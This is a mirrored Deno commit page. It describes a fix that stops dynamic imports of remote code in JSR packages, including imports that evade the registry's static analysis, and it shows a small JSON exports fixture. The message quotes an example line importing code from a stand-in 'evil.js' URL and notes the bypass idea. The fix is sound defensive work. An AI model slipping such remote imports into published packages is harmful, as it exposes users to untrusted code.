mirror of
https://github.com/denoland/deno.git
synced 2024-12-15 03:48:02 -05:00
918c5e648f
A security feature of JSR is that it is self contained other than npm dependencies. At publish time, the registry rejects packages that write code like this: ```ts const data = await import("https://example.com/evil.js"); ``` However, this can be trivially bypassed by writing code that the registry cannot statically analyze for. This PR prevents Deno from loading dynamic imports that do this.
6 lines
104 B
JSON
6 lines
104 B
JSON
{
|
|
"exports": {
|
|
"./unanalyzable": "./unanalyzable.ts",
|
|
"./analyzable": "./analyzable.ts"
|
|
}
|
|
}
|